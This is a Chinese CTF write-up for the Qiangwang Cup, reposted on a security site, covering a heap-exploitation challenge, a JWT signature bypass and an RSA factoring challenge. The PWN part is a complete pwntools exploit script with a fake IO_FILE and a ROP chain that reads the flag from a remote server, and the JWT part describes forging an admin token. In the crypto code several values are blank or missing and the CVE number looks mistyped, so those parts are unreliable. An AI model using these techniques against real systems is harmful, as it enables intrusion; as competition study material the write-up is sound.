强网杯WriteUp|PWN & Crypto

admin 2023年3月18日20:26:34评论37 views字数 19304阅读64分20秒阅读模式

PWN








































  • houseofcat

from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
libc=ELF('libc.so.6')
#p = process(["./ld-linux-x86-64.so.2", "./house_of_cat"],env={"LD_PRELOAD":"./libc.so.6"})
#p=process('./npuctf_pwn')
p=remote('182.92.82.77',29165)
def add(id,size,data):
    p.recvuntil('mew mew mew~~~~~~n')
    payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
    p.sendline(payload)
    p.recvuntil('plz input your cat choice:')
    p.sendline('1')
    p.recvuntil('plz input your cat idx:n')
    p.sendline(str(id))
    p.recvuntil('our cat size:n')
    p.sendline(str(size))
    p.recvuntil('r content:n')
    p.send(str(data))
def edit(id,data):
    p.recvuntil('mew mew mew~~~~~~n')
    payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
    p.sendline(payload)
    p.recvuntil('plz input your cat choice:')
    p.sendline('4')
    p.recvuntil('plz input your cat idx:n')
    p.sendline(str(id))
    p.recvuntil('lz input your content:n')
    p.sendline(str(data))
def delete(id):
    p.recvuntil('mew mew mew~~~~~~n')
    payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
    p.sendline(payload)
    p.recvuntil('plz input your cat choice:')
    p.sendline('2')
    p.recvuntil('plz input your cat idx:n')
    p.sendline(str(id))
def show(id):
    p.recvuntil('mew mew mew~~~~~~n')
    payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
    p.sendline(payload)
    p.recvuntil('plz input your cat choice:')
    p.sendline('3')
    p.recvuntil('plz input your cat idx:n')
    p.sendline(str(id))

p.recvuntil('mew mew mew~~~~~~n')

payload='LOGIN | r00t QWBQWXF adminx00'
p.sendline(payload)

add(15,0x458,'a'*0x450+p64(0x00000000fbad8087))
add(0,0x450,'aaa')
add(1,0x430,'aaa')
add(3,0x440,'aaa')
add(9,0x440,'aaa')
add(10,0x440,'aaa')
add(11,0x440,'aaa')
delete(0)
show(0)
p.recvuntil('ext:n')

leak=u64(p.recv(6).ljust(8,'x00'))

libcbase=leak-(0x7ffff7fa7ce0-0x00007ffff7d8e000)

writejmp=libcbase+(0x7ffff7fa40c0-0x00007ffff7d8e000)-0x48
_IO_wstrn_jumps=libcbase+(0x7ffff7fa3ac0-0x00007ffff7d8e000)-0x10
a=libcbase+(0x00007ffff7d8b740-0x00007ffff7d8e000)

add(4,0x460,'bbbbb')

show(0)

p.recvuntil('ext:n')
p.recv(0x10)
leak=u64(p.recv(6).ljust(8,'x00'))

heap=leak-(0x7ffff7fff6f0-0x00007ffff7fff000)

addr=heap+(0x7ffff8001560-0x00007ffff7fff000)
fake_IO_FILE = 2*p64(0)
fake_IO_FILE += p64(1)                    #change _IO_write_base = 1
fake_IO_FILE += p64(0xffffffffffff)        #change _IO_write_ptr = 0xffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0x111111111)                #v4
fake_IO_FILE += p64(0x22222222222222)    
fake_IO_FILE = fake_IO_FILE.ljust(0x88'a')   
fake_IO_FILE += p64(addr)           #v5
fake_IO_FILE = fake_IO_FILE.ljust(0x90'a')
fake_IO_FILE += p64(addr)                    #change _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xc8'a')
fake_IO_FILE += p64(writejmp)        #change vtable
payload = fake_IO_FILE + '/bin/shx00'

add(2,0x450,payload)

delete(2)

'''
0x00000000000778be : mov rdx, rbx ; call qword ptr [r13 + 0x38]
0x000000000005a170 : mov rsp, rdx ; ret
0x000000000011df1c : pop r11 ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
0x000000000002a3e5 : pop rdi ; ret
0x000000000002be51 : pop rsi ; ret
0x000000000011f497 : pop rdx ; pop r12 ; ret
0x0000000000045eb0 : pop rax ; ret

'''
gadget1=libcbase+0x00000000000778be
gadget2=libcbase+0x000000000005a170
pop_rdi=libcbase+0x000000000002a3e5

pop_rsi=libcbase+0x000000000002be51
pop_rdx_r12=libcbase+0x000000000011f497
pop_rax=libcbase+0x0000000000045eb0

close=libcbase+libc.sym['close']
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
syscall=libcbase+0x114990
addr2=heap+(0x7ffff7ffffa0-0x7ffff7fff000)
setcontext=libcbase+0x053A6D 
pay=p64(0)*2+p64(heap)*7+p64(addr+0x40)+p64(0)+p64(gadget1)*5+p64(0)+p64(setcontext)+p64(0)*4+p64(addr2)+p64(pop_rdi)
pay=pay.ljust(0xf0,'c')+p64(addr)
add(13,0x460,pay)
delete(3)
mp=libcbase+(0x7ffff7fa73c0-0x7ffff7d8e000)
arena=libcbase+(0x00007ffff7fa80e0-0x7ffff7d8e000)
ioall=libcbase+(0x7ffff7fa8680-0x7ffff7d8e000)
stderr=libcbase+(0x7ffff7fa8860-0x7ffff7d8e000)
edit(2,p64(arena)*2+p64(stderr-0x20)*2)

pay=p64(0)+p64(close)+p64(pop_rdi)+p64(addr2+0x200)+p64(pop_rsi)+p64(2)+p64(pop_rax)+p64(2)+p64(syscall)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(addr2+0x200)+p64(pop_rdx_r12)+p64(0x30)+p64(0)+p64(pop_rax)+p64(0)+p64(syscall)+p64(pop_rdi)+p64(1)+p64(write)

pay=pay.ljust(0x200,'x00')+'./flagx00'
add(6,0x420,pay)

delete(10)

top=libcbase+(0x7ffff7fa7ce0-0x7ffff7d8e000)

edit(2,p64(arena)*2+p64(top-0x20)*2)

add(5,0x420,'aaa')
print hex(heap)
print hex(libcbase)
#gdb.attach(p,'b *'+str(0x00007ffff7fb8000+0x177f)+'nb *'+str(0x00007ffff7fb8000+0x1884)+'nb *0x7ffff7e14410nb *0x7ffff7db83e5')
#raw_input()

p.recvuntil('mew mew mew~~~~~~n')
payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
p.sendline(payload)
p.recvuntil('plz input your cat choice:')
p.sendline('1')
p.recvuntil('plz input your cat idx:n')
p.sendline(str(12))
p.recvuntil('our cat size:n')
p.sendline(str(1135))
p.interactive()


Crypto








































  • myJWT

cve-2022-214490可以绕过签名的正确性检查。
下载源代码后,通过计算正常执行流程中sig的长度,然后填充相对应长度的0;同时将代码51行的payload.put("admin", false);改为payload.put("admin", true);,然后执行代码获得jwt

强网杯WriteUp|PWN & Crypto

 
将该jwt在服务器上执行即可读取到flag

强网杯WriteUp|PWN & Crypto

 

  • Factor

当拿到题目的时候发现和d3ctf几乎是一样的,所以就参照d3ctf提供的paper进行参考。
https://eprint.iacr.org/2015/399.pdf
但是我们发现d3ctf中的那道题已经给出了m1m2,这道题需要我们连分数,然后rsa解密求出m1,和m2

强网杯WriteUp|PWN & Crypto

然后在根据paper,我们需要构造模下方程求小根得到b,然后在构造模下方程求小根分解n得到pq,然后rsa解密得到z

强网杯WriteUp|PWN & Crypto 

用解出来的z,构造方程分解n,得到pq然后rsa再解密得到flag强网杯WriteUp|PWN & Crypto


from Crypto.Util.number import *

from sympy import isprime

n

n

e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865

e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881

n2=209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209

e2=65537

n

e

c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579

c

c2=18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653

c

def transform(x,y):

  res=[]

  while y:

    res.append(x//y)

    x,y=y,x%y

  return res

def continued_fraction(sub_res):

  numerator,denominator=1,0

  for i in sub_res[::-1]:

    denominator,numerator=numerator,i*numerator+denominator

  return denominator,numerator

def sub_fraction(x,y):

  res=transform(x,y)

  res=list(map(continued_fraction,(res[0:i] for i in range(1,len(res)))))

  return res

for (p12,p11) in sub_fraction(n11,n12):

  if n11 % p11 == 0 and p11 != 1 :

    break

q11 = isqrt(n11//p11)

q12 = isqrt(n12//p12)

 assert isprime(int(q11)) and p11 * q11^2 == n11 

assert isprime(int(q12)) and p12 * q12^2 == n12 

d11 = pow(e11,-1,(p11-1)^2*q11)

d12 = pow(e12,-1,(p12-1)^2*q12)

##########

m11 = pow(c11,d11,n11)

m12 = pow(c12,d12,n12)

##########

PR.<x> = Zmod(n2)[]

f = int(m11)*int(m12)*x-(int(m11)-int(m12)) # 用解出来的m1m2构造方程分解n得到pq

k = f.monic().small_roots(X = 2^1000,beta = 0.75)[0]

p2_6 = gcd(int(m11)*int(m12)*int(k)-(int(m11)-int(m12)),n2)

p2 = gcd(n2//int(p2_6),p2_6)

q2 = n2 //int(p2^7)

assert isprime(int(p2)) and isprime(int(q2)) and p2^7 * q2 == n2

phi2 = (p2-1)*p2^6*(q2-1)

d2 = pow(0x10001,-1,phi2)

##########

z = pow(c2,d2,n2)   # 然后rsa解密得到z

##########

PR.<x> = Zmod(n3)[]

f = e3*x-int(z)  # 用解密得到的z,构造方程分解n3,得到pq,然后rsa解密得到flag

k = f.monic().small_roots(X = 2^1000,beta = 0.75)[0]

p3_6 = gcd(e3*k-int(z), n3) 

p3 = gcd(n3//int(p3_6),p3_6)

q3 = n3 // int(p3^7)
 
assert isprime(int(p3)) and isprime(int(q3)) and p3^7 * q3 == n3

phi3 = (p3-1)*p3^6*(q3-1)

d3 = pow(e3,-1,phi3)

##########

flag = long_to_bytes(pow(c3,d3,n3))

##########
print(flag)


 
       

原文始发于微信公众号(山石网科安全技术研究院):强网杯WriteUp|PWN & Crypto

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月18日20:26:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   强网杯WriteUp|PWN & Cryptohttps://cn-sec.com/archives/1221421.html

发表评论

匿名网友 填写信息